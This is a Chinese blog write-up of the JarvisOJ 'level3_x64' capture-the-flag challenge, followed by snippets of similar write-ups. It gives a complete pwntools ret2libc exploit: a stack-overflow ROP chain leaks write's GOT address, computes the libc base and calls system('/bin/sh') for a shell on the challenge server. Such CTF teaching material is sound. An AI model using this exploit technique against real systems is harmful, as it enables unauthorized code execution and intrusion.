JarvisOJ level3_x64

最新推荐文章于 2021-11-15 14:15:09 发布
最新推荐文章于 2021-11-15 14:15:09 发布
阅读量998 收藏
点赞数
文章标签: pwn 栈溢出 ROP x64
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95203256
版权

这题和level3大同小异,只不过这一题是x64的程序

做这题之前,建议先写level2_x64。
拿到这题,我们首先查看保护:
在这里插入图片描述
程序只开了NX保护,好的。
根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找):
vul()函数:
在这里插入图片描述
write()函数的plt地址:
在这里插入图片描述
之后我们找齐需要用的gadget:
在这里插入图片描述
但是我们并没有找到pop rdx ; ret,根据我们对write函数的了解,最后一个参数是用来控制长度的,所以,只要rdx寄存器的长度大于0x8就没有问题:
我们看一下:
在这里插入图片描述
我们通过GDB查看一下,运行时,rdx的值为0x200,这是完全足够的,我们就不需要控制他并对其赋值了。
做好以上准备之后,我们就可以来构造payload了,因为本题与level3的payload大同小异,在此就不详细讲构造过程了,直接给出完整的exp:

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com','9883')
elf=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')
write_plt=elf.symbols['write']
write_got=elf.got['write']
vul_addr=0x04005e6
pop_rdi_addr=0x04006b3
pop_rsi_addr=0x04006b1
payload='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_addr)+p64(write_got)+p64(0x0)+p64(write_plt)+p64(vul_addr)
p.recvuntil('Input:\n')
p.send(payload)
write_addr=u64(p.recv(8))
print "write_addr="+hex(write_addr)
write_libc=libc.symbols['write']
libc_eee=write_addr-write_libc
sys_libc=libc.symbols['system']
sh_libc=libc.search('/bin/sh').next()
sys_addr=libc_eee+sys_libc
sh_addr=libc_eee+sh_libc
p.recvuntil('Input:\n')
payload1='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(sh_addr)+p64(sys_addr)+'A'*8
p.send(payload1)
p.interactive()

运行结果:
在这里插入图片描述

PLpa、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 455
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
jarvisoj_level3_x64
最新发布
qq_62887641的博客
09-21 172
64位,只开了nx栈溢出
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 234
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 802
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
uTinyRipper_x64 (2)_uTinyRipper_x64_
10-01
《uTinyRipper_x64:Unity资源提取利器详解》 在数字娱乐产业中,Unity引擎因其强大的功能和易用性,已经成为许多开发者首选的游戏开发工具。然而,有时我们可能需要从Unity游戏或应用程序中提取资源,如模型、纹理...
3D_LevelSet 2_levelset_forwardweh_3Dlevelset_
10-02
《3D LevelSet方法在3D医学图像分割中的简单实现》 在计算机视觉与医学成像领域,3D LevelSet方法是一种广泛应用于图像分割的重要技术。该方法通过数学上的水平集理论,对复杂的三维图像进行精确分割,尤其适用于...
glog_VS2015_X64
11-19
在"VS2015_X64"环境下,Glog可以很好地运行,但可能在配置和使用过程中遇到一些挑战。 **1. 安装与配置** 在Visual Studio 2015环境下构建和使用Glog,首先需要下载源代码并进行编译。你可以通过Git克隆Glog的...
level3_part1_done.zip
11-29
最近在学uipath,花了2天的时间做好了uipath level3 第一部分的流程,没用他的框架 这部分的流程大致是打开acme-test的网站,然后刮取所以的页面数据,在筛选出WI5的WIID,再打开sha1 的网站生成hash值,最后再把hash值...
level_set_image.rar_level set_level set 方程
09-21
3. 求解Level Set方程:使用有限差分或者数值积分的方法,更新φ函数的值,模拟其随时间的演化。 4. 重构边界:由于Level Set方法可能导致φ函数的宽度变宽,需要通过重初始化或重新嵌入来保持其厚度恒定。 5. 分割...
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 879
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 307
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
Jarvis OJ [XMAN]level1 write up
03-12 116
首先 老规矩,把软件拖到Ubuntu里checksec一下文件 然后知道了软件位数就放到IDA32里面。。。 熟悉的函数名。。。 缘真的妙不可言。。。 然后看了下vulnerable_function函数的栈结构 算了下 vulnerable_function中的read函数准备给buf 0x100的空间 但是buf却用了0x88+0x4就结束了vul...
【BUUCTF】jarvisoj_level3
m0_51251108的博客
12-28 343
【BUUCTF】jarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
Jarvis OJ [XMAN]level3(x64)
九层台
07-09 1061
liu@liu-F117-F:~/桌面/oj/level3_x64$ checksec level3_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3_x64/level3_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
Jarvis OJ_level3_入门栈溢出
Jc
07-11 328
附录:发现这个网站的题还是挺系统的,对于入门pwn的是挺好的一个选择 解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP
jarvisoj_level2_x64
m0_52231248的博客
11-15 516
jarvisoj_level2_x64 Checksec: Ida: 很容易找到溢出点,offest=0x88,程序有system的plt地址,搜索bin_sh字段 构造exp: Flag;
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1240
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值